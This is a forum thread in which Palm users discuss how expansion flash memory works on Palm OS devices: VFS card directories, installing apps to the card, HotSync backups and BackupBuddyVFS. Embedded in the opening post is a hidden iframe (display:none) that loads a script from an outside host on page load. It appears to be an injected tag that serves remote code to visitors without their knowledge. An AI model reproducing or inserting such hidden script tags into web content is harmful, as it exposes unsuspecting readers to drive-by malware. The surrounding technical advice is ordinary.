+ Reply to Thread

How does the flash memory work?

I know that the palm OS does not have any equivalent to a directory hierarchy or drive letters so how is the expansion memory distinguished?

I'm a 6135 owner and my biggest gripe about it is that it goes amnesic on me too many times for me to tolerate. I'm thinking of getting an m505 until I the 7135 comes down in price.

Can you store both apps and databases on the memory?

I come from the world of the HP 200LX which is a regular DOS machine. The flash card shows up as drive A: and I can use pkzip to backup my volatile C: drive to the non-volatile A: drive. I like the simplicity of that. How can that be accomplished. Even on CE the memory card is just a directory. It's not nearly as flexible as the 200lx but you can install apps and data as well as move stuff around with a file manager.

How does the memory get backed up to the PC? Does a regular Hotsynch do it?

How can you back up the volatile internal memory to the memory card?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm no technical guru for the palm platform...

But!

There IS a program that can backup all of your phone's memory to a memory card and it can also restore it if ever it crashes.

And I believe the palm does have a file structure. audio/ for audio songs/files (that's the most common one I see) And there's 4 other directories as well, just the names elude me right now.

Heh...somsone care to correct me? I'm sure I missed alot or am mistaken here somewhere..

cojonesdetoro,

That's some name you've got there... and a lot to live up to!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito Burrito
    cojonesdetoro,

That's some name you've got there... and a lot to live up to!
    What's the big deal? It's an ingredient some people put in a paella... In Denver, Co. it's in a dish called 'Rocky Mountain Oysters'. It's actually quite good with a little hot sauce on the side. ;^>

You may put it in your paella, but I don't.
    Nice huevos.
    ~'kito
    pdaPhoneHome Moderator

Actually it kind of reminds me of when I attended University over in England and one of my Brit friends with a heavy cockney accent used to say, "This is the dog's bollocks, this is", whenever he tasted a meal that was really delicious.

Sorry this is sooooooo
    ~'kito
    pdaPhoneHome Moderator

Re: How does the flash memory work?

Originally posted by cojonesdetoro
    I know that the palm OS does not have any equivalent to a directory hierarchy or drive letters so how is the expansion memory distinguished?
    Palm OS 4.x does support VFS (Virtual File System). Palms, in generally, have one root directory. All apps, and their databases and preference files are stored in teh same root directory, however linked to the the application that owns them.

The memory card has sub directories. This is how the Palm can distiguish what is on it. For example:
    • /PALM/Launcher/ contains applications and their databases to be run directly from the card. This is the directory that the Palm looks for to determine if any applications are present. If there are, it will display the application in the "Card" category on the Palm.
    • /Audio/ contains audio files for the MP3 player.
    • /Backup/ is a directory created by BackUpBuddyVFS (www.bluenomad.com) where it stores all the data from the Palm's internal RAM for backup purposes.
    Can you store both apps and databases on the memory?
    Yes, you can install applications direclty to the card. Ever noticed the "Change Destination" button on the install tool that's always grayed out (at least on the latest version of Palm Desktop)? After syncing a VFS device with a memory card slot, this button is available to you to use. You select the application you are installing, and hit the button to change it's target to the card.

As far as databases, that depends on what you are asking. Databases that are created by an application are stored in the same directory as the application. Now, if you are refering to a database in the form of an installable application, then yes, it can go on the card.

How does the memory get backed up to the PC? Does a regular Hotsynch do it?
    Memory is backed up to the PC during a syncronization. Syncronizations install application syou have in que, syncronize your applications with the desktop version, and then backs up the handset memory. THe syncornization is samrt, and checks to see if the data file on the Palm is older or newer then the last back up of that file. If the back and Palm version are the same as last time, it doesn't back it up again. However, if it has changed, it will created a new backup, replacing the old.

How can you back up the volatile internal memory to the memory card?
    Earlier I mentioned BackupBuddyVFS, check them out at www.bluenomad.com. I haven't tried any others, but I am sure there probably some out there.

Thanks for the informative response. This is a pretty cool forum.

I just thought of another question.

Is there a file manager that lets you copy files to/from the flash card without using a PC with hotsync?

I think BackupBuddy VFS can do this. In fact, I'm depending on it for restores when I'm on the road.